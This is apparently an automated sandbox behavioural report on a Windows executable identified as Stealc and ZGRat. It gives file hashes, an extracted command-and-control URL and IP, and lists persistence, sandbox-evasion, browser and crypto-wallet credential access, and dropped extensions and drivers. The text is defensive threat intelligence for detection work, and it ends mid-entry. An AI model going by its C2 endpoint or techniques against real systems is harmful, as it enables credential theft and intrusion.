Analysis
-
max time kernel
129s -
max time network
130s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
03/04/2024, 11:07
Static task
static1
Behavioral task
behavioral1
Sample
8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe
Resource
win10v2004-20240226-en
Errors
General
-
Target
8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe
-
Size
5.5MB
-
MD5
701c4e45fa484bab72325df9cee69c80
-
SHA1
d0b7535defb7d3141b55022312d740833fae8f2b
-
SHA256
8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab
-
SHA512
a6a3a2bd483b84e7057eb71f3215602a78c12cf37782eb6af5b1d0461ffa4e8d6834921ef9b2557211aa12cccd4fbde8e4b2c0d6ecdfbbb1e7b21ff22413f395
-
SSDEEP
49152:xIFzxLh+7KFc/rfltudWjXjGjYBJTcWIQKY6sB+gk89esANH1vcUbgkE4W4ed+aW:8h+PL1rkPFDO3RUdSI9LwrYbn
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral2/memory/4072-427-0x0000029FA9570000-0x0000029FACE68000-memory.dmp family_zgrat_v1 behavioral2/memory/4072-431-0x0000029FC7720000-0x0000029FC7830000-memory.dmp family_zgrat_v1 behavioral2/memory/4072-435-0x0000029FC7590000-0x0000029FC75B4000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 4uvUAteuguw1CkjoosA4Oh3Y.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 69 3860 rundll32.exe 71 4984 msiexec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\DRIVERS\SET3A5F.tmp MsiExec.exe File created C:\Windows\system32\DRIVERS\SET3A5F.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\VBoxDrv.sys MsiExec.exe -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000\Control Panel\International\Geo\Nation jyVPweM.exe -
Drops startup file 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J3ANYTcMRSUV42X9IAgegwcR.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2hrO5JrqUMS2rLA944YUJ96H.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dHTfMGu4DQh3ZuyqJtqZcFzX.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DLiSynRR9FetnAtED0tVBpeI.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RFrTpj3W1XS1UxscoYKlMexr.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qCFLQSCCzgekvUepqmoU4y2I.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoWEsIOgRZ5izmI0ZQdY3l8e.bat CasPol.exe -
Executes dropped EXE 22 IoCs
pid Process 984 JlrDisb6QpmQ9haRBnx0XPia.exe 3264 urc.0.exe 1416 urc.1.exe 4156 fLFBog0wp6NBRBqe0KRLGOMA.exe 1444 4uvUAteuguw1CkjoosA4Oh3Y.exe 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 1808 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 3032 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 2492 Install.exe 784 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 3828 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 4924 8WRinhYPmXJoVFf980Ft3cF1.exe 2108 Install.exe 3172 Assistant_108.0.5067.20_Setup.exe_sfx.exe 2660 assistant_installer.exe 880 assistant_installer.exe 4968 HCBGDGCAAK.exe 2104 SnjMgxW.exe 3816 jyVPweM.exe 3784 cymoeqqwvGpbZ2JBspmlizbe.exe 1124 ce-installer_7.14.2_vbox-6.1.20.exe 2032 ce_7.14.2_windows_x86_64.exe -
Loads dropped DLL 18 IoCs
pid Process 3332 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 1808 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 3032 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 784 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 3828 buTfUAKLG6Z7VwsHgBNeoZ5x.exe 2660 assistant_installer.exe 2660 assistant_installer.exe 880 assistant_installer.exe 880 assistant_installer.exe 3264 urc.0.exe 3264 urc.0.exe 3860 rundll32.exe 1204 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 1204 MsiExec.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSDS.exe\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ThreadingModel = "Both" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxProxyStub.dll" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ThreadingModel = "Free" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ThreadingModel = "Free" msiexec.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" cymoeqqwvGpbZ2JBspmlizbe.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json jyVPweM.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json jyVPweM.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini jyVPweM.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: buTfUAKLG6Z7VwsHgBNeoZ5x.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: buTfUAKLG6Z7VwsHgBNeoZ5x.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\D: buTfUAKLG6Z7VwsHgBNeoZ5x.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\D: buTfUAKLG6Z7VwsHgBNeoZ5x.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 2 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 api.myip.com 43 ipinfo.io 8 ipinfo.io 10 api.myip.com -
Drops file in System32 directory 40 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 jyVPweM.exe File opened for modification C:\Windows\system32\DRVSTORE MsiExec.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sys MsiExec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jyVPweM.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 4uvUAteuguw1CkjoosA4Oh3Y.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jyVPweM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 jyVPweM.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 4uvUAteuguw1CkjoosA4Oh3Y.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jyVPweM.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt MsiExec.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SnjMgxW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jyVPweM.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 4uvUAteuguw1CkjoosA4Oh3Y.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 jyVPweM.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf MsiExec.exe File opened for modification C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf MsiExec.exe File opened for modification C:\Windows\System32\GroupPolicy 4uvUAteuguw1CkjoosA4Oh3Y.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 jyVPweM.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jyVPweM.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.cat MsiExec.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SnjMgxW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jyVPweM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 jyVPweM.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2288 set thread context of 2068 2288 8bc50fc624999c1b88ed8b842e195d279fdf33e24458b00d74f026026a09d2ab.exe 80 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_de.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ca.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_lt.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\rhel3_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_th.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\DbgPlugInDiggers.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestPropSvc.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxHostChannel.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSupLib.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_en.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_id.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_tr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat67_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\License_en_US.rtf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDD2.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.exe msiexec.exe File created C:\Program Files (x86)\LCifMpYymZWU2\jFukxTAKTFueC.dll jyVPweM.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\AoEwiXE.xml jyVPweM.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\lgw_postinstall.sh msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_zh_TW.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\platforms\qwindows.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_uk.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_eu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_zh_CN.qm msiexec.exe File created C:\Program Files (x86)\LCifMpYymZWU2\yCrzHCd.xml jyVPweM.exe File created C:\Program Files\Oracle\VirtualBox\VBoxRes.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxTestOGL.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ru.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\rhel5_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\fedora_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxWebSrv.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_bg.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_TW.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_el.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\SDL.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_pt_BR.qm msiexec.exe File created C:\Program Files (x86)\gbPxNkbXHfUn\sJXwJjk.dll jyVPweM.exe File created C:\Program Files\Oracle\VirtualBox\x86\msvcp100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\msvcr100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxBugReport.exe msiexec.exe File created C:\Program Files (x86)\yvWovCiVU\FkTKFe.dll jyVPweM.exe File created C:\Program Files\Oracle\VirtualBox\msvcp100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5CoreVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_uk.qm msiexec.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\SihNFRy.dll jyVPweM.exe File created C:\Program Files\Oracle\VirtualBox\VBoxManage.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxProxyStub.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxVMM.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\ubuntu_preseed.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\vbox-img.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ja.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSharedFolders.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VMMR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hr_HR.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_nl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\win_nt5_unattended.sif msiexec.exe -
Drops file in Windows directory 25 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI32AF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI337B.tmp msiexec.exe File opened for modification C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File created C:\Windows\Installer\e592cb7.msi msiexec.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File opened for modification C:\Windows\Installer\e592cb3.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI460C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI39E5.tmp msiexec.exe File created C:\Windows\Installer\e592cb3.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF0FE3F47E9C70714A.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI3570.tmp msiexec.exe File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job schtasks.exe File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job schtasks.exe File created C:\Windows\SystemTemp\~DFFBD78E12803B0AFB.TMP msiexec.exe File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job schtasks.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File created C:\Windows\SystemTemp\~DF0FC9B0532D589316.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF1DFC1D635D5A2F86.TMP msiexec.exe File opened for modification C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job schtasks.exe File created C:\Windows\Installer\SourceHash{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC} msiexec.exe File opened for modification C:\Windows\Installer\MSI462C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI46F8.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 932 984 WerFault.exe 81 1124 3264 WerFault.exe 82 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI urc.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI urc.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI urc.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 urc.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString urc.0.exe -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3896 schtasks.exe 3472 schtasks.exe 1244 schtasks.exe 132 schtasks.exe 1416 schtasks.exe 3804 schtasks.exe 3188 schtasks.exe 1896 schtasks.exe 4900 schtasks.exe 2748 schtasks.exe 4116 schtasks.exe 4132 schtasks.exe 4196 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MsiExec.exe Set value 